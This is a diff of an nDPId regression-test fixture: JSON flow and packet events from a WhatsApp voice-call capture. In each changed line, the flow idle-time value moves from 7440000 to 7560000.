+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1561455707513,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455707513,"pkt":"xiwDYGpkkLkxKPrKCABFAAA0AABAAEAGxevAqAIMnfAUNMVIAbt68MpOu7CnhYAQBAb72QAAAQEICjTOSZq1oF6C"} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":251,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1561455707474,"flow_last_seen":1561455707524,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1561455707524,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pps.whatsapp.net","ja3":"7a7a639628f0fe5c7e057628a5bbec5a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1561455707474,"flow_last_seen":1561455707564,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1561455707564,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.3","client_requested_server_name":"pps.whatsapp.net","ja3":"7a7a639628f0fe5c7e057628a5bbec5a","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1561455709888,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1561455709888,"pkt":"AQBeAAD7kLkxKPrKCABFAABNP9UAAP8R2BrAqAIM4AAA+xTpFOkAOUTGAAAAAAACAAAAAAAABV9yYW9wBF90Y3AFbG9jYWwAAAwAAQhfYWlycGxhecASAAwAAQ=="} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1561455709890,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":111,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":111,"pkt_l4_len":57,"thread_ts_msec":1561455709890,"pkt":"MzMAAAD7kLkxKPrKht1gDagnADkR\/\/6AAAAAAAAABBRAnYr9nwX\/AgAAAAAAAAAAAAAAAAD7FOkU6QA5e0MAAAAAAAIAAAAAAAAFX3Jhb3AEX3RjcAVsb2NhbAAADAABCF9haXJwbGF5wBIADAAB"} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1561455709984,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1561455709984,"pkt":"AQBef\/\/6kLkxKPrKCABFAACggMsAAAIRhNPAqAIM7\/\/\/+vzMB2wAjOY9TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOldBTklQQ29ubmVjdGlvbjoxDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KTVg6IDMNCg0K"} @@ -119,9 +119,9 @@ 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1561455732919,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455732919,"pkt":"xiwDYGpkkLkxKPrKCABFAABIV+kAAEAREIzAqAIMATxOQNwI+xoANBvDAAEAGCESpELCs7YUVt8QVzF73yEACAAUMmINwHB46SKyj3xrODHnuD6GHSA="} 00690{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":632,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1561455705874,"flow_last_seen":1561455737893,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1561455737893,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} 00699{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":633,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1561455705874,"flow_last_seen":1561455737895,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1561455737895,"l3_proto":"ip6","src_ip":"fe80::414:409d:8afd:9f05","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":640,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455738163,"flow_last_seen":1561455738163,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1561455738163,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"169.254.162.244","src_port":49352,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1561455738163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1561455738163,"pkt":"2DBiVgAckLkxKPrKCABFAAAok2wAAP8GGLzAqAIMqf6i9MDIwAcC6LXACBPPY1AQCAWHOAAA"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":641,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1561455738163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455738163,"pkt":"kLkxKPrKxiwDYGpkCABFAAA0AAAAAP8GrByp\/qL0wKgCDMAHwMgIE89jAui1wYAQEABYwQAAAQEIChqjwVI0zNyh"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":640,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455738163,"flow_last_seen":1561455738163,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1561455738163,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"169.254.162.244","src_port":49352,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1561455738163,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1561455738163,"pkt":"2DBiVgAckLkxKPrKCABFAAAok2wAAP8GGLzAqAIMqf6i9MDIwAcC6LXACBPPY1AQCAWHOAAA"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":641,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1561455738163,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455738163,"pkt":"kLkxKPrKxiwDYGpkCABFAAA0AAAAAP8GrByp\/qL0wKgCDMAHwMgIE89jAui1wYAQEABYwQAAAQEIChqjwVI0zNyh"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":713,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741430,"flow_last_seen":1561455741430,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455741430,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":50191,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00628{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1561455741430,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1561455741430,"pkt":"AQBef\/\/6kLkxKPrKCABFAAClZnoAAAIRnx\/AqAIM7\/\/\/+sQPB2wAke7DTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":713,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741430,"flow_last_seen":1561455741430,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455741430,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":50191,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} @@ -133,10 +133,10 @@ 00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":716,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741484,"flow_last_seen":1561455741484,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1561455741484,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.962659} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1561455742405,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1561455742405,"pkt":"xiwDYGpkkLkxKPrKCABFAAA4TCgAAEAB17nAqAIMW\/w4MwMDoOEAAAAARQAAZumbAAAxEUkIW\/w4M8CoAgx\/wNwIAFIAAA=="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1561455742405,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1561455742405,"pkt":"xiwDYGpkkLkxKPrKCABFAAA4HrIAAEABBTDAqAIMW\/w4MwMDoOEAAAAARQAAZp1RAAAxEZVSW\/w4M8CoAgx\/wNwIAFIAAA=="} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1561455688201,"flow_last_seen":1561455742310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6423,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"17.242.60.84","src_port":49354,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} -00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455738163,"flow_last_seen":1561455738163,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"169.254.162.244","src_port":49352,"dst_port":49159,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455738163,"flow_last_seen":1561455738163,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"169.254.162.244","src_port":49352,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":85,"flow_first_seen":1561455707474,"flow_last_seen":1561455707887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":41946,"flow_avg_l4_payload_len":493,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1561455688201,"flow_last_seen":1561455742310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6423,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"17.242.60.84","src_port":49354,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} +00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455738163,"flow_last_seen":1561455738163,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"169.254.162.244","src_port":49352,"dst_port":49159,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455738163,"flow_last_seen":1561455738163,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"169.254.162.244","src_port":49352,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":85,"flow_first_seen":1561455707474,"flow_last_seen":1561455707887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":41946,"flow_avg_l4_payload_len":493,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"}} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1561455721320,"flow_last_seen":1561455738622,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1500,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":164,"flow_first_seen":1561455730495,"flow_last_seen":1561455742404,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":25046,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"91.252.56.51","dst_ip":"192.168.2.12","src_port":32704,"dst_port":56328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455741432,"flow_last_seen":1561455741432,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":57546,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} @@ -144,8 +144,8 @@ 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1561455705874,"flow_last_seen":1561455737895,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip6","src_ip":"fe80::414:409d:8afd:9f05","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455701309,"flow_last_seen":1561455731356,"flow_idle_time":180000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":340,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455687942,"flow_last_seen":1561455687944,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":51431,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1561455702980,"flow_last_seen":1561455703262,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"17.171.47.85","dst_ip":"192.168.2.12","src_port":443,"dst_port":50502,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1561455702980,"flow_last_seen":1561455703262,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"17.171.47.85","dst_ip":"192.168.2.12","src_port":443,"dst_port":50502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1561455702980,"flow_last_seen":1561455703262,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"17.171.47.85","dst_ip":"192.168.2.12","src_port":443,"dst_port":50502,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1561455702980,"flow_last_seen":1561455703262,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"17.171.47.85","dst_ip":"192.168.2.12","src_port":443,"dst_port":50502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455704556,"flow_last_seen":1561455704556,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"169.254.162.244","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706914,"flow_last_seen":1561455741420,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706913,"flow_last_seen":1561455741419,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} @@ -153,12 +153,12 @@ 